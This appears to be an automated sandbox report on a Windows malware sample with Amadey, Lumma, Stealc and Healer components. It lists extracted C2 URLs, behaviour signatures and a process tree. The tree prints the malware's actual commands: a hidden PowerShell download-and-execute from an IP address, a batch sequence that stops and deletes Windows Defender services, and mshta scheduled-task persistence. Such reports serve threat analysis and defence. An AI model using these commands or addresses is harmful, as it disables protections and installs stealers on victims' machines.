Resubmissions

28/03/2025, 18:26

250328-w3prbsztes 10

28/03/2025, 17:35

250328-v6e6mayzet 10

Analysis

  • max time kernel
    121s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    28/03/2025, 17:35

General

  • Target

    37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe

  • Size

    1.8MB

  • MD5

    8480b3439f6f2fe71ff8136c8475a0e1

  • SHA1

    8f787c424f7a1ac854d26b723008ea29d9f1b1aa

  • SHA256

    37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8

  • SHA512

    2b72c1f30549156dcf42aff32d2967580147a1cc499ca93f7a3e2b773e814bd9c368772d6ed02031c086b2c8376b405d30c7a43abff0729732232ad008e97958

  • SSDEEP

    49152:fyPxPnQHIr7nIXvPvwrARGSLEUBLEffrLrr90+:6PxfQoTIXvPYlSLEWgXrLrr

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://-smeltingt.run/giiaus

https://8ferromny.digital/gwpd

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://jpsmeltingt.run/giiaus

https://ferromny.digital/gwpd

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 21 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 35 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
    "C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
        "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1976 -s 28
          4⤵
          • Loads dropped DLL
          PID:3016
      • C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
        "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2028
      • C:\Users\Admin\AppData\Local\Temp\10359310101\Or1ARiR.exe
        "C:\Users\Admin\AppData\Local\Temp\10359310101\Or1ARiR.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2656
      • C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe
        "C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 956 -s 28
          4⤵
          • Loads dropped DLL
          PID:1824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin\'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:392
      • C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2208
          • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
            "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2112
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2112 -s 36
              6⤵
              • Loads dropped DLL
              PID:940
          • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
            "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 3024 -s 36
              6⤵
              • Loads dropped DLL
              PID:1332
          • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
            "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1708
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 1708 -s 36
              6⤵
              • Loads dropped DLL
              PID:2476
          • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
            "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3048
            • C:\Users\Admin\AppData\Local\Temp\is-SLNK0.tmp\Bell_Setup16.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-SLNK0.tmp\Bell_Setup16.tmp" /SL5="$C0200,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2624
              • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2096
                • C:\Users\Admin\AppData\Local\Temp\is-GS8OJ.tmp\Bell_Setup16.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-GS8OJ.tmp\Bell_Setup16.tmp" /SL5="$D0200,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  PID:296
                  • C:\Windows\SysWOW64\regsvr32.exe
                    "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                    9⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2300
          • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
            "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
            5⤵
            • Executes dropped EXE
            PID:2104
          • C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
            "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
            5⤵
            • Executes dropped EXE
            PID:1172
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 1172 -s 28
              6⤵
              • Loads dropped DLL
              PID:2984
          • C:\Users\Admin\AppData\Local\Temp\10043050101\436e1cc62f.exe
            "C:\Users\Admin\AppData\Local\Temp\10043050101\436e1cc62f.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2604
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10043050101\436e1cc62f.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2028
          • C:\Users\Admin\AppData\Local\Temp\10043060101\b801a9df2a.exe
            "C:\Users\Admin\AppData\Local\Temp\10043060101\b801a9df2a.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1096
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10043060101\b801a9df2a.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3552
      • C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe
        "C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"
        3⤵
        • Executes dropped EXE
        PID:2020
      • C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:960
        • C:\Users\Admin\AppData\Local\Temp\22.exe
          "C:\Users\Admin\AppData\Local\Temp\22.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:620
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E540.tmp\E541.tmp\E5B0.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
            5⤵
              PID:2360
              • C:\Users\Admin\AppData\Local\Temp\22.exe
                "C:\Users\Admin\AppData\Local\Temp\22.exe" go
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1568
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E714.tmp\E715.tmp\E716.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                  7⤵
                  • Drops file in Program Files directory
                  PID:108
                  • C:\Windows\system32\sc.exe
                    sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                    8⤵
                    • Launches sc.exe
                    PID:952
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:1596
                  • C:\Windows\system32\timeout.exe
                    timeout /t 1
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1680
                  • C:\Windows\system32\sc.exe
                    sc stop ddrver
                    8⤵
                    • Launches sc.exe
                    PID:2376
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:800
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1716
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2544
                  • C:\Windows\system32\sc.exe
                    sc stop "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:2824
                  • C:\Windows\system32\sc.exe
                    sc delete "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:1288
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                    8⤵
                      PID:2392
                    • C:\Windows\system32\sc.exe
                      sc stop "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:2684
                    • C:\Windows\system32\sc.exe
                      sc delete "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:2680
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                      8⤵
                        PID:1004
                      • C:\Windows\system32\sc.exe
                        sc stop "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:2332
                      • C:\Windows\system32\sc.exe
                        sc delete "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:1724
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                        8⤵
                          PID:2132
                        • C:\Windows\system32\sc.exe
                          sc stop "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:2144
                        • C:\Windows\system32\sc.exe
                          sc delete "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:2988
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                          8⤵
                            PID:3020
                          • C:\Windows\system32\sc.exe
                            sc stop "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:2328
                          • C:\Windows\system32\sc.exe
                            sc delete "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:2764
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                            8⤵
                              PID:2480
                            • C:\Windows\system32\sc.exe
                              sc stop "SgrmBroker"
                              8⤵
                              • Launches sc.exe
                              PID:2832
                            • C:\Windows\system32\sc.exe
                              sc delete "SgrmBroker"
                              8⤵
                              • Launches sc.exe
                              PID:2272
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                              8⤵
                                PID:2460
                              • C:\Windows\system32\sc.exe
                                sc stop "SecurityHealthService"
                                8⤵
                                • Launches sc.exe
                                PID:2276
                              • C:\Windows\system32\sc.exe
                                sc delete "SecurityHealthService"
                                8⤵
                                • Launches sc.exe
                                PID:2868
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                8⤵
                                  PID:2972
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefsvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2900
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefsvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2976
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                  8⤵
                                    PID:2844
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefusersvc"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2940
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefusersvc"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2996
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                    8⤵
                                      PID:2156
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdNisDrv"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2784
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdNisDrv"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2344
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                      8⤵
                                        PID:1468
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdBoot"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2828
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdBoot"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1600
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                        8⤵
                                          PID:2580
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdFilter"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1120
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdFilter"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1548
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                          8⤵
                                            PID:1940
                                          • C:\Windows\system32\sc.exe
                                            sc stop "SgrmAgent"
                                            8⤵
                                            • Launches sc.exe
                                            PID:1888
                                          • C:\Windows\system32\sc.exe
                                            sc delete "SgrmAgent"
                                            8⤵
                                            • Launches sc.exe
                                            PID:1892
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                            8⤵
                                              PID:2256
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecWfp"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2992
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecWfp"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2100
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                              8⤵
                                                PID:2720
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecFlt"
                                                8⤵
                                                • Launches sc.exe
                                                PID:1068
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecFlt"
                                                8⤵
                                                • Launches sc.exe
                                                PID:1900
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                8⤵
                                                  PID:1976
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecCore"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:1208
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecCore"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:2608
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                  8⤵
                                                    PID:364
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                    8⤵
                                                      PID:2800
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                      8⤵
                                                        PID:2244
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                        8⤵
                                                          PID:2304
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                          8⤵
                                                            PID:2060
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop ddrver
                                                            8⤵
                                                            • Launches sc.exe
                                                            PID:1040
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete ddrver
                                                            8⤵
                                                            • Launches sc.exe
                                                            PID:3052
                                                • C:\Users\Admin\AppData\Local\Temp\10361130101\38eb6df4e0.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10361130101\38eb6df4e0.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:1956
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c schtasks /create /tn aotfcmaUMkN /tr "mshta C:\Users\Admin\AppData\Local\Temp\BAtZ04Scy.hta" /sc minute /mo 25 /ru "Admin" /f
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1496
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /tn aotfcmaUMkN /tr "mshta C:\Users\Admin\AppData\Local\Temp\BAtZ04Scy.hta" /sc minute /mo 25 /ru "Admin" /f
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:524
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    mshta C:\Users\Admin\AppData\Local\Temp\BAtZ04Scy.hta
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies Internet Explorer settings
                                                    PID:2072
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                      5⤵
                                                      • Blocklisted process makes network request
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Downloads MZ/PE file
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2320
                                                      • C:\Users\Admin\AppData\Local\TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE
                                                        "C:\Users\Admin\AppData\Local\TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2716
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\10361140121\am_no.cmd" "
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:812
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 2
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Delays execution with timeout.exe
                                                    PID:1676
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2680
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1004
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2996
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2156
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2516
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1348
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /create /tn "S7LzsmaP49f" /tr "mshta \"C:\Temp\Xpo0sHCje.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2608
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    mshta "C:\Temp\Xpo0sHCje.hta"
                                                    4⤵
